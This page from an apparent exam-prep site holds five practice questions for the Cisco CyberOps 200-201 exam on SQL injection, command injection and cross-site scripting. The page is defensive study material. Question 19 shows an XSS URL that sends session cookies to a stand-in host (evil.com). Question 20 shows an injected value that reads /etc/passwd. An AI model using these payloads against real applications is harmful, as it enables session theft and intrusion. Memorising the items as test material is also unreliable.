Examers.io
ExamsOrganizationsHow it worksPricingHelp & FAQ
Cisco logo

CiscoCertified CyberOps Associate

Domain 2Objective 6

2.6 Describe Web Application Attacks, Such as SQL Injection, Command Injections, and Cross-Site Scripting 200-201 Practice Questions (Page 4)

Part of the 2.0 Security Monitoring domain, which accounts for 25% of the 200-201 exam. Cisco does not publish an official question count, but from its 120-minute exam (~50–80 total, ~13–20 in this domain), expect 1–2 from this objective — we provide 29 practice questions to prepare you well beyond it. (estimate)

29questions here
6free pages
3concepts
25%of the exam

Questions 16–20

  1. 16foundation · easy

    Which of the following best describes how SQL injection attacks manipulate database queries?

    Select an answer first
  2. 17expert · hard

    A security analyst is reviewing a web application that has a login form and a file upload feature. The login form is vulnerable to SQL injection, and the file upload feature is vulnerable to command injection. The analyst must recommend a single mitigation that addresses both vulnerabilities without breaking functionality. Which of the following is the most effective recommendation?

    Select an answer first
  3. 18application · medium

    A security analyst is reviewing a web application that allows users to submit comments. The comments are stored in a database and displayed on a public page. The analyst notices that a comment containing `<script>alert('x')</script>` is executed when other users view the page. Which remediation is most appropriate?

    Select an answer first
  4. 19application · medium

    A security analyst is investigating a series of attacks on a web application. The analyst finds that an attacker used a URL like `https://example.com/search?q=<script>fetch('https://evil.com?c='+document.cookie)</script>` and tricked a victim into clicking it. The victim's session cookie was sent to the attacker. Which attack occurred?

    Select an answer first
  5. 20application · medium

    A Linux-based web application has a 'ping' diagnostic tool that accepts an IP address and displays the output. A security analyst discovers that submitting `127.0.0.1; cat /etc/passwd` returns the contents of the password file. The application must continue to allow legitimate ping requests. Which control is most effective to prevent this attack?

    Select an answer first
Finished these 5 questions?

Review the revealed explanations, or continue through the curriculum.

Free Basic Practice is a study aid with revealable answers — not a scored exam. Examers.io is independent and not affiliated with or endorsed by Cisco. “200-201” is a trademark of its owner, used for identification only.